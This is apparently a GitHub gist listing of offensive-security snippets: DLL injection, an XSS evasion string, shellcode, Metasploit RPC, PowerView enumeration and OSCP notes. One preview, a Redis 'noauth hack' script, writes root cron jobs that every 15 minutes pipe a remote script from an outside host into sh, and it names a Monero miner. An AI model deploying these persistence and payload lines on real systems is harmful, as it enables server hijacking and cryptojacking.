- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
RobinDavid
/ dll_injection.py
Created
February 25, 2014 17:49
Sample ddl injection (Gray Hat Python)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| from ctypes import * | |
| PAGE_READWRITE = 0x04 | |
| PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) | |
| VIRTUAL_MEM = ( 0x1000 | 0x2000 ) | |
| kernel32 = windll.kernel32 #Get the wanted dll | |
| pid = sys.argv[1] #Gather sent parameters |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet | |
| # based on the RSnake original http://ha.ckers.org/xss.html | |
| # Retrieved on 2013-11-20 | |
| # Much of this wildly obsolete | |
| # | |
| # XSS Locator 2 | |
| '';!--"<XSS>=&{()} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INTRO | |
| I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
| Short Link: http://tiny.cc/awssecurity | |
| Official AWS Security Resources | |
| * Security Blog - http://blogs.aws.amazon.com/security/ | |
| * Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
| * Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
| * Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import struct | |
| import shutil | |
| import subprocess | |
| class macho_intel32_shellcode(): | |
| """ | |
| Mach-O Intel x32 shellcode class | |
| """ |
carnal0wnage
/ msgrpc_ssh_version.py
Last active
April 19, 2020 14:22
python script to connect to a metasploit msgrpc instance, setup and run an auxilary module.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import msfrpc | |
| import time | |
| if __name__ == '__main__': | |
| # Create a new instance of the Msfrpc client with the default options | |
| client = msfrpc.Msfrpc({}) | |
| # Login to the msf server using the password "abc123" |
HarmJ0y
/ PowerView-2.0-tricks.ps1
Last active
September 30, 2024 16:39
PowerView-2.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
lokielse
/ redis-noauth-lady-hack.sh
Last active
November 23, 2021 20:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin | |
| echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root | |
| mkdir -p /var/spool/cron/crontabs | |
| echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root | |
| # ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr & | |
| if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then |
unfo
/ how-to-oscp-final.md
Last active
September 23, 2024 17:38
meldridge
/ how-to-oscp-final.md
Last active
April 12, 2024 02:06
— forked from unfo/how-to-oscp-final.md
How to pass the OSCP
UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- Recon
- Find vuln
- Exploit
- Escalate
- Document it
OlderNewer